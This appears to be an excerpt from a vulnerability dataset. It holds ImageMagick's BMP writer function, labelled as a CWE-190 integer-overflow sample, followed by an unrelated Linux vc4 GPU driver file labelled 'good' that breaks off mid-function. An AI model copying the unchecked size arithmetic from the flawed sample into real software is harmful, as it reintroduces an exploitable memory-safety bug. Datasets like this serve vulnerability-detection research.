%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% W r i t e B M P I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% WriteBMPImage() writes an image in Microsoft Windows bitmap encoded
% image format, version 3 for Windows or (if the image has a matte channel)
% version 4.
%
% The format of the WriteBMPImage method is:
%
% MagickBooleanType WriteBMPImage(const ImageInfo *image_info,
% Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows.
%
% o image_info: the image info.
%
% o image: The image.
%
% o exception: return any errors or warnings in this structure.
%
*/
static MagickBooleanType WriteBMPImage(const ImageInfo *image_info,Image *image,
ExceptionInfo *exception)
{
BMPInfo
bmp_info;
const char
*option;
const StringInfo
*profile;
MagickBooleanType
have_color_info,
status;
MagickOffsetType
scene;
MemoryInfo
*pixel_info;
register const Quantum
*p;
register ssize_t
i,
x;
register unsigned char
*q;
size_t
bytes_per_line,
type;
ssize_t
y;
unsigned char
*bmp_data,
*pixels;
/*
Open output image file.
*/
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickCoreSignature);
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
status=OpenBlob(image_info,image,WriteBinaryBlobMode,exception);
if (status == MagickFalse)
return(status);
type=4;
if (LocaleCompare(image_info->magick,"BMP2") == 0)
type=2;
else
if (LocaleCompare(image_info->magick,"BMP3") == 0)
type=3;
option=GetImageOption(image_info,"bmp:format");
if (option != (char *) NULL)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Format=%s",option);
if (LocaleCompare(option,"bmp2") == 0)
type=2;
if (LocaleCompare(option,"bmp3") == 0)
type=3;
if (LocaleCompare(option,"bmp4") == 0)
type=4;
}
scene=0;
do
{
/*
Initialize BMP raster file header.
*/
(void) TransformImageColorspace(image,sRGBColorspace,exception);
(void) ResetMagickMemory(&bmp_info,0,sizeof(bmp_info));
bmp_info.file_size=14+12;
if (type > 2)
bmp_info.file_size+=28;
bmp_info.offset_bits=bmp_info.file_size;
bmp_info.compression=BI_RGB;
if ((image->storage_class == PseudoClass) && (image->colors > 256))
(void) SetImageStorageClass(image,DirectClass,exception);
if (image->storage_class != DirectClass)
{
/*
Colormapped BMP raster.
*/
bmp_info.bits_per_pixel=8;
if (image->colors <= 2)
bmp_info.bits_per_pixel=1;
else
if (image->colors <= 16)
bmp_info.bits_per_pixel=4;
else
if (image->colors <= 256)
bmp_info.bits_per_pixel=8;
if (image_info->compression == RLECompression)
bmp_info.bits_per_pixel=8;
bmp_info.number_colors=1U << bmp_info.bits_per_pixel;
if (image->alpha_trait != UndefinedPixelTrait)
(void) SetImageStorageClass(image,DirectClass,exception);
else
if ((size_t) bmp_info.number_colors < image->colors)
(void) SetImageStorageClass(image,DirectClass,exception);
else
{
bmp_info.file_size+=3*(1UL << bmp_info.bits_per_pixel);
bmp_info.offset_bits+=3*(1UL << bmp_info.bits_per_pixel);
if (type > 2)
{
bmp_info.file_size+=(1UL << bmp_info.bits_per_pixel);
bmp_info.offset_bits+=(1UL << bmp_info.bits_per_pixel);
}
}
}
if (image->storage_class == DirectClass)
{
/*
Full color BMP raster.
*/
bmp_info.number_colors=0;
bmp_info.bits_per_pixel=(unsigned short)
((type > 3) && (image->alpha_trait != UndefinedPixelTrait) ? 32 : 24);
bmp_info.compression=(unsigned int) ((type > 3) &&
(image->alpha_trait != UndefinedPixelTrait) ? BI_BITFIELDS : BI_RGB);
if ((type == 3) && (image->alpha_trait != UndefinedPixelTrait))
{
option=GetImageOption(image_info,"bmp3:alpha");
if (IsStringTrue(option))
bmp_info.bits_per_pixel=32;
}
}
bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32);
bmp_info.ba_offset=0;
profile=GetImageProfile(image,"icc");
have_color_info=(image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL) || (image->gamma != 0.0) ? MagickTrue :
MagickFalse;
if (type == 2)
bmp_info.size=12;
else
if ((type == 3) || ((image->alpha_trait == UndefinedPixelTrait) &&
(have_color_info == MagickFalse)))
{
type=3;
bmp_info.size=40;
}
else
{
int
extra_size;
bmp_info.size=108;
extra_size=68;
if ((image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL))
{
bmp_info.size=124;
extra_size+=16;
}
bmp_info.file_size+=extra_size;
bmp_info.offset_bits+=extra_size;
}
bmp_info.width=(ssize_t) image->columns;
bmp_info.height=(ssize_t) image->rows;
bmp_info.planes=1;
bmp_info.image_size=(unsigned int) (bytes_per_line*image->rows);
bmp_info.file_size+=bmp_info.image_size;
bmp_info.x_pixels=75*39;
bmp_info.y_pixels=75*39;
switch (image->units)
{
case UndefinedResolution:
case PixelsPerInchResolution:
{
bmp_info.x_pixels=(unsigned int) (100.0*image->resolution.x/2.54);
bmp_info.y_pixels=(unsigned int) (100.0*image->resolution.y/2.54);
break;
}
case PixelsPerCentimeterResolution:
{
bmp_info.x_pixels=(unsigned int) (100.0*image->resolution.x);
bmp_info.y_pixels=(unsigned int) (100.0*image->resolution.y);
break;
}
}
bmp_info.colors_important=bmp_info.number_colors;
/*
Convert MIFF to BMP raster pixels.
*/
pixel_info=AcquireVirtualMemory((size_t) bmp_info.image_size,
sizeof(*pixels));
if (pixel_info == (MemoryInfo *) NULL)
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);
(void) ResetMagickMemory(pixels,0,(size_t) bmp_info.image_size);
switch (bmp_info.bits_per_pixel)
{
case 1:
{
size_t
bit,
byte;
/*
Convert PseudoClass image to a BMP monochrome image.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
ssize_t
offset;
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
bit=0;
byte=0;
for (x=0; x < (ssize_t) image->columns; x++)
{
byte<<=1;
byte|=GetPixelIndex(image,p) != 0 ? 0x01 : 0x00;
bit++;
if (bit == 8)
{
*q++=(unsigned char) byte;
bit=0;
byte=0;
}
p+=GetPixelChannels(image);
}
if (bit != 0)
{
*q++=(unsigned char) (byte << (8-bit));
x++;
}
offset=(ssize_t) (image->columns+7)/8;
for (x=offset; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 4:
{
size_t
byte,
nibble;
ssize_t
offset;
/*
Convert PseudoClass image to a BMP monochrome image.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
nibble=0;
byte=0;
for (x=0; x < (ssize_t) image->columns; x++)
{
byte<<=4;
byte|=((size_t) GetPixelIndex(image,p) & 0x0f);
nibble++;
if (nibble == 2)
{
*q++=(unsigned char) byte;
nibble=0;
byte=0;
}
p+=GetPixelChannels(image);
}
if (nibble != 0)
{
*q++=(unsigned char) (byte << 4);
x++;
}
offset=(ssize_t) (image->columns+1)/2;
for (x=offset; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 8:
{
/*
Convert PseudoClass packet to BMP pixel.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=(unsigned char) GetPixelIndex(image,p);
p+=GetPixelChannels(image);
}
for ( ; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 24:
{
/*
Convert DirectClass packet to BMP BGR888.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=ScaleQuantumToChar(GetPixelBlue(image,p));
*q++=ScaleQuantumToChar(GetPixelGreen(image,p));
*q++=ScaleQuantumToChar(GetPixelRed(image,p));
p+=GetPixelChannels(image);
}
for (x=3L*(ssize_t) image->columns; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 32:
{
/*
Convert DirectClass packet to ARGB8888 pixel.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=ScaleQuantumToChar(GetPixelBlue(image,p));
*q++=ScaleQuantumToChar(GetPixelGreen(image,p));
*q++=ScaleQuantumToChar(GetPixelRed(image,p));
*q++=ScaleQuantumToChar(GetPixelAlpha(image,p));
p+=GetPixelChannels(image);
}
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
}
if ((type > 2) && (bmp_info.bits_per_pixel == 8))
if (image_info->compression != NoCompression)
{
MemoryInfo
*rle_info;
/*
Convert run-length encoded raster pixels.
*/
rle_info=AcquireVirtualMemory((size_t) (2*(bytes_per_line+2)+2),
(image->rows+2)*sizeof(*pixels));
if (rle_info == (MemoryInfo *) NULL)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
}
bmp_data=(unsigned char *) GetVirtualMemoryBlob(rle_info);
bmp_info.file_size-=bmp_info.image_size;
bmp_info.image_size=(unsigned int) EncodeImage(image,bytes_per_line,
pixels,bmp_data);
bmp_info.file_size+=bmp_info.image_size;
pixel_info=RelinquishVirtualMemory(pixel_info);
pixel_info=rle_info;
pixels=bmp_data;
bmp_info.compression=BI_RLE8;
}
/*
Write BMP for Windows, all versions, 14-byte header.
*/
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Writing BMP version %.20g datastream",(double) type);
if (image->storage_class == DirectClass)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Storage class=DirectClass");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Storage class=PseudoClass");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Image depth=%.20g",(double) image->depth);
if (image->alpha_trait != UndefinedPixelTrait)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Matte=True");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Matte=MagickFalse");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" BMP bits_per_pixel=%.20g",(double) bmp_info.bits_per_pixel);
switch ((int) bmp_info.compression)
{
case BI_RGB:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_RGB");
break;
}
case BI_RLE8:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_RLE8");
break;
}
case BI_BITFIELDS:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_BITFIELDS");
break;
}
default:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=UNKNOWN (%lu)",bmp_info.compression);
break;
}
}
if (bmp_info.number_colors == 0)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number_colors=unspecified");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number_colors=%lu",bmp_info.number_colors);
}
(void) WriteBlob(image,2,(unsigned char *) "BM");
(void) WriteBlobLSBLong(image,bmp_info.file_size);
(void) WriteBlobLSBLong(image,bmp_info.ba_offset); /* always 0 */
(void) WriteBlobLSBLong(image,bmp_info.offset_bits);
if (type == 2)
{
/*
Write 12-byte version 2 bitmap header.
*/
(void) WriteBlobLSBLong(image,bmp_info.size);
(void) WriteBlobLSBSignedShort(image,(signed short) bmp_info.width);
(void) WriteBlobLSBSignedShort(image,(signed short) bmp_info.height);
(void) WriteBlobLSBShort(image,bmp_info.planes);
(void) WriteBlobLSBShort(image,bmp_info.bits_per_pixel);
}
else
{
/*
Write 40-byte version 3+ bitmap header.
*/
(void) WriteBlobLSBLong(image,bmp_info.size);
(void) WriteBlobLSBSignedLong(image,(signed int) bmp_info.width);
(void) WriteBlobLSBSignedLong(image,(signed int) bmp_info.height);
(void) WriteBlobLSBShort(image,bmp_info.planes);
(void) WriteBlobLSBShort(image,bmp_info.bits_per_pixel);
(void) WriteBlobLSBLong(image,bmp_info.compression);
(void) WriteBlobLSBLong(image,bmp_info.image_size);
(void) WriteBlobLSBLong(image,bmp_info.x_pixels);
(void) WriteBlobLSBLong(image,bmp_info.y_pixels);
(void) WriteBlobLSBLong(image,bmp_info.number_colors);
(void) WriteBlobLSBLong(image,bmp_info.colors_important);
}
if ((type > 3) && ((image->alpha_trait != UndefinedPixelTrait) ||
(have_color_info != MagickFalse)))
{
/*
Write the rest of the 108-byte BMP Version 4 header.
*/
(void) WriteBlobLSBLong(image,0x00ff0000U); /* Red mask */
(void) WriteBlobLSBLong(image,0x0000ff00U); /* Green mask */
(void) WriteBlobLSBLong(image,0x000000ffU); /* Blue mask */
(void) WriteBlobLSBLong(image,0xff000000U); /* Alpha mask */
(void) WriteBlobLSBLong(image,0x73524742U); /* sRGB */
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.red_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.red_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.red_primary.x+
image->chromaticity.red_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.green_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.green_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.green_primary.x+
image->chromaticity.green_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.blue_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.blue_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.blue_primary.x+
image->chromaticity.blue_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.x*0x10000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.y*0x10000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.z*0x10000));
if ((image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL))
{
ssize_t
intent;
switch ((int) image->rendering_intent)
{
case SaturationIntent:
{
intent=LCS_GM_BUSINESS;
break;
}
case RelativeIntent:
{
intent=LCS_GM_GRAPHICS;
break;
}
case PerceptualIntent:
{
intent=LCS_GM_IMAGES;
break;
}
case AbsoluteIntent:
{
intent=LCS_GM_ABS_COLORIMETRIC;
break;
}
default:
{
intent=0;
break;
}
}
(void) WriteBlobLSBLong(image,(unsigned int) intent);
(void) WriteBlobLSBLong(image,0x00); /* dummy profile data */
(void) WriteBlobLSBLong(image,0x00); /* dummy profile length */
(void) WriteBlobLSBLong(image,0x00); /* reserved */
}
}
if (image->storage_class == PseudoClass)
{
unsigned char
*bmp_colormap;
/*
Dump colormap to file.
*/
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Colormap: %.20g entries",(double) image->colors);
bmp_colormap=(unsigned char *) AcquireQuantumMemory((size_t) (1UL <<
bmp_info.bits_per_pixel),4*sizeof(*bmp_colormap));
if (bmp_colormap == (unsigned char *) NULL)
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
q=bmp_colormap;
for (i=0; i < (ssize_t) MagickMin((ssize_t) image->colors,(ssize_t) bmp_info.number_colors); i++)
{
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].blue));
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].green));
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].red));
if (type > 2)
*q++=(unsigned char) 0x0;
}
for ( ; i < (ssize_t) (1UL << bmp_info.bits_per_pixel); i++)
{
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
if (type > 2)
*q++=(unsigned char) 0x00;
}
if (type <= 2)
(void) WriteBlob(image,(size_t) (3*(1L << bmp_info.bits_per_pixel)),
bmp_colormap);
else
(void) WriteBlob(image,(size_t) (4*(1L << bmp_info.bits_per_pixel)),
bmp_colormap);
bmp_colormap=(unsigned char *) RelinquishMagickMemory(bmp_colormap);
}
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Pixels: %lu bytes",bmp_info.image_size);
(void) WriteBlob(image,(size_t) bmp_info.image_size,pixels);
pixel_info=RelinquishVirtualMemory(pixel_info);
if (GetNextImageInList(image) == (Image *) NULL)
break;
image=SyncNextImageInList(image);
status=SetImageProgress(image,SaveImagesTag,scene++,
GetImageListLength(image));
if (status == MagickFalse)
break;
} while (image_info->adjoin != MagickFalse);
(void) CloseBlob(image);
return(MagickTrue);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5223_1 |
crossvul-cpp_data_good_3121_0 | /*
* Copyright © 2014 Broadcom
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
* IN THE SOFTWARE.
*/
#include <linux/module.h>
#include <linux/platform_device.h>
#include <linux/pm_runtime.h>
#include <linux/device.h>
#include <linux/io.h>
#include "uapi/drm/vc4_drm.h"
#include "vc4_drv.h"
#include "vc4_regs.h"
#include "vc4_trace.h"
static void
vc4_queue_hangcheck(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
mod_timer(&vc4->hangcheck.timer,
round_jiffies_up(jiffies + msecs_to_jiffies(100)));
}
struct vc4_hang_state {
struct drm_vc4_get_hang_state user_state;
u32 bo_count;
struct drm_gem_object **bo;
};
static void
vc4_free_hang_state(struct drm_device *dev, struct vc4_hang_state *state)
{
unsigned int i;
for (i = 0; i < state->user_state.bo_count; i++)
drm_gem_object_unreference_unlocked(state->bo[i]);
kfree(state);
}
int
vc4_get_hang_state_ioctl(struct drm_device *dev, void *data,
struct drm_file *file_priv)
{
struct drm_vc4_get_hang_state *get_state = data;
struct drm_vc4_get_hang_state_bo *bo_state;
struct vc4_hang_state *kernel_state;
struct drm_vc4_get_hang_state *state;
struct vc4_dev *vc4 = to_vc4_dev(dev);
unsigned long irqflags;
u32 i;
int ret = 0;
spin_lock_irqsave(&vc4->job_lock, irqflags);
kernel_state = vc4->hang_state;
if (!kernel_state) {
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return -ENOENT;
}
state = &kernel_state->user_state;
/* If the user's array isn't big enough, just return the
* required array size.
*/
if (get_state->bo_count < state->bo_count) {
get_state->bo_count = state->bo_count;
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return 0;
}
vc4->hang_state = NULL;
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
/* Save the user's BO pointer, so we don't stomp it with the memcpy. */
state->bo = get_state->bo;
memcpy(get_state, state, sizeof(*state));
bo_state = kcalloc(state->bo_count, sizeof(*bo_state), GFP_KERNEL);
if (!bo_state) {
ret = -ENOMEM;
goto err_free;
}
for (i = 0; i < state->bo_count; i++) {
struct vc4_bo *vc4_bo = to_vc4_bo(kernel_state->bo[i]);
u32 handle;
ret = drm_gem_handle_create(file_priv, kernel_state->bo[i],
&handle);
if (ret) {
state->bo_count = i - 1;
goto err;
}
bo_state[i].handle = handle;
bo_state[i].paddr = vc4_bo->base.paddr;
bo_state[i].size = vc4_bo->base.base.size;
}
if (copy_to_user((void __user *)(uintptr_t)get_state->bo,
bo_state,
state->bo_count * sizeof(*bo_state)))
ret = -EFAULT;
kfree(bo_state);
err_free:
vc4_free_hang_state(dev, kernel_state);
err:
return ret;
}
static void
vc4_save_hang_state(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
struct drm_vc4_get_hang_state *state;
struct vc4_hang_state *kernel_state;
struct vc4_exec_info *exec[2];
struct vc4_bo *bo;
unsigned long irqflags;
unsigned int i, j, unref_list_count, prev_idx;
kernel_state = kcalloc(1, sizeof(*kernel_state), GFP_KERNEL);
if (!kernel_state)
return;
state = &kernel_state->user_state;
spin_lock_irqsave(&vc4->job_lock, irqflags);
exec[0] = vc4_first_bin_job(vc4);
exec[1] = vc4_first_render_job(vc4);
if (!exec[0] && !exec[1]) {
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return;
}
/* Get the bos from both binner and renderer into hang state. */
state->bo_count = 0;
for (i = 0; i < 2; i++) {
if (!exec[i])
continue;
unref_list_count = 0;
list_for_each_entry(bo, &exec[i]->unref_list, unref_head)
unref_list_count++;
state->bo_count += exec[i]->bo_count + unref_list_count;
}
kernel_state->bo = kcalloc(state->bo_count,
sizeof(*kernel_state->bo), GFP_ATOMIC);
if (!kernel_state->bo) {
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return;
}
prev_idx = 0;
for (i = 0; i < 2; i++) {
if (!exec[i])
continue;
for (j = 0; j < exec[i]->bo_count; j++) {
drm_gem_object_reference(&exec[i]->bo[j]->base);
kernel_state->bo[j + prev_idx] = &exec[i]->bo[j]->base;
}
list_for_each_entry(bo, &exec[i]->unref_list, unref_head) {
drm_gem_object_reference(&bo->base.base);
kernel_state->bo[j + prev_idx] = &bo->base.base;
j++;
}
prev_idx = j + 1;
}
if (exec[0])
state->start_bin = exec[0]->ct0ca;
if (exec[1])
state->start_render = exec[1]->ct1ca;
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
state->ct0ca = V3D_READ(V3D_CTNCA(0));
state->ct0ea = V3D_READ(V3D_CTNEA(0));
state->ct1ca = V3D_READ(V3D_CTNCA(1));
state->ct1ea = V3D_READ(V3D_CTNEA(1));
state->ct0cs = V3D_READ(V3D_CTNCS(0));
state->ct1cs = V3D_READ(V3D_CTNCS(1));
state->ct0ra0 = V3D_READ(V3D_CT00RA0);
state->ct1ra0 = V3D_READ(V3D_CT01RA0);
state->bpca = V3D_READ(V3D_BPCA);
state->bpcs = V3D_READ(V3D_BPCS);
state->bpoa = V3D_READ(V3D_BPOA);
state->bpos = V3D_READ(V3D_BPOS);
state->vpmbase = V3D_READ(V3D_VPMBASE);
state->dbge = V3D_READ(V3D_DBGE);
state->fdbgo = V3D_READ(V3D_FDBGO);
state->fdbgb = V3D_READ(V3D_FDBGB);
state->fdbgr = V3D_READ(V3D_FDBGR);
state->fdbgs = V3D_READ(V3D_FDBGS);
state->errstat = V3D_READ(V3D_ERRSTAT);
spin_lock_irqsave(&vc4->job_lock, irqflags);
if (vc4->hang_state) {
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
vc4_free_hang_state(dev, kernel_state);
} else {
vc4->hang_state = kernel_state;
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
}
}
static void
vc4_reset(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
DRM_INFO("Resetting GPU.\n");
mutex_lock(&vc4->power_lock);
if (vc4->power_refcount) {
/* Power the device off and back on the by dropping the
* reference on runtime PM.
*/
pm_runtime_put_sync_suspend(&vc4->v3d->pdev->dev);
pm_runtime_get_sync(&vc4->v3d->pdev->dev);
}
mutex_unlock(&vc4->power_lock);
vc4_irq_reset(dev);
/* Rearm the hangcheck -- another job might have been waiting
* for our hung one to get kicked off, and vc4_irq_reset()
* would have started it.
*/
vc4_queue_hangcheck(dev);
}
static void
vc4_reset_work(struct work_struct *work)
{
struct vc4_dev *vc4 =
container_of(work, struct vc4_dev, hangcheck.reset_work);
vc4_save_hang_state(vc4->dev);
vc4_reset(vc4->dev);
}
static void
vc4_hangcheck_elapsed(unsigned long data)
{
struct drm_device *dev = (struct drm_device *)data;
struct vc4_dev *vc4 = to_vc4_dev(dev);
uint32_t ct0ca, ct1ca;
unsigned long irqflags;
struct vc4_exec_info *bin_exec, *render_exec;
spin_lock_irqsave(&vc4->job_lock, irqflags);
bin_exec = vc4_first_bin_job(vc4);
render_exec = vc4_first_render_job(vc4);
/* If idle, we can stop watching for hangs. */
if (!bin_exec && !render_exec) {
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
return;
}
ct0ca = V3D_READ(V3D_CTNCA(0));
ct1ca = V3D_READ(V3D_CTNCA(1));
/* If we've made any progress in execution, rearm the timer
* and wait.
*/
if ((bin_exec && ct0ca != bin_exec->last_ct0ca) ||
(render_exec && ct1ca != render_exec->last_ct1ca)) {
if (bin_exec)
bin_exec->last_ct0ca = ct0ca;
if (render_exec)
render_exec->last_ct1ca = ct1ca;
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
vc4_queue_hangcheck(dev);
return;
}
spin_unlock_irqrestore(&vc4->job_lock, irqflags);
/* We've gone too long with no progress, reset. This has to
* be done from a work struct, since resetting can sleep and
* this timer hook isn't allowed to.
*/
schedule_work(&vc4->hangcheck.reset_work);
}
static void
submit_cl(struct drm_device *dev, uint32_t thread, uint32_t start, uint32_t end)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
/* Set the current and end address of the control list.
* Writing the end register is what starts the job.
*/
V3D_WRITE(V3D_CTNCA(thread), start);
V3D_WRITE(V3D_CTNEA(thread), end);
}
int
vc4_wait_for_seqno(struct drm_device *dev, uint64_t seqno, uint64_t timeout_ns,
bool interruptible)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
int ret = 0;
unsigned long timeout_expire;
DEFINE_WAIT(wait);
if (vc4->finished_seqno >= seqno)
return 0;
if (timeout_ns == 0)
return -ETIME;
timeout_expire = jiffies + nsecs_to_jiffies(timeout_ns);
trace_vc4_wait_for_seqno_begin(dev, seqno, timeout_ns);
for (;;) {
prepare_to_wait(&vc4->job_wait_queue, &wait,
interruptible ? TASK_INTERRUPTIBLE :
TASK_UNINTERRUPTIBLE);
if (interruptible && signal_pending(current)) {
ret = -ERESTARTSYS;
break;
}
if (vc4->finished_seqno >= seqno)
break;
if (timeout_ns != ~0ull) {
if (time_after_eq(jiffies, timeout_expire)) {
ret = -ETIME;
break;
}
schedule_timeout(timeout_expire - jiffies);
} else {
schedule();
}
}
finish_wait(&vc4->job_wait_queue, &wait);
trace_vc4_wait_for_seqno_end(dev, seqno);
return ret;
}
static void
vc4_flush_caches(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
/* Flush the GPU L2 caches. These caches sit on top of system
* L3 (the 128kb or so shared with the CPU), and are
* non-allocating in the L3.
*/
V3D_WRITE(V3D_L2CACTL,
V3D_L2CACTL_L2CCLR);
V3D_WRITE(V3D_SLCACTL,
VC4_SET_FIELD(0xf, V3D_SLCACTL_T1CC) |
VC4_SET_FIELD(0xf, V3D_SLCACTL_T0CC) |
VC4_SET_FIELD(0xf, V3D_SLCACTL_UCC) |
VC4_SET_FIELD(0xf, V3D_SLCACTL_ICC));
}
/* Sets the registers for the next job to be actually be executed in
* the hardware.
*
* The job_lock should be held during this.
*/
void
vc4_submit_next_bin_job(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
struct vc4_exec_info *exec;
again:
exec = vc4_first_bin_job(vc4);
if (!exec)
return;
vc4_flush_caches(dev);
/* Either put the job in the binner if it uses the binner, or
* immediately move it to the to-be-rendered queue.
*/
if (exec->ct0ca != exec->ct0ea) {
submit_cl(dev, 0, exec->ct0ca, exec->ct0ea);
} else {
vc4_move_job_to_render(dev, exec);
goto again;
}
}
void
vc4_submit_next_render_job(struct drm_device *dev)
{
struct vc4_dev *vc4 = to_vc4_dev(dev);
struct vc4_exec_info *exec = vc4_first_render_job(vc4);
if (!exec)
return;
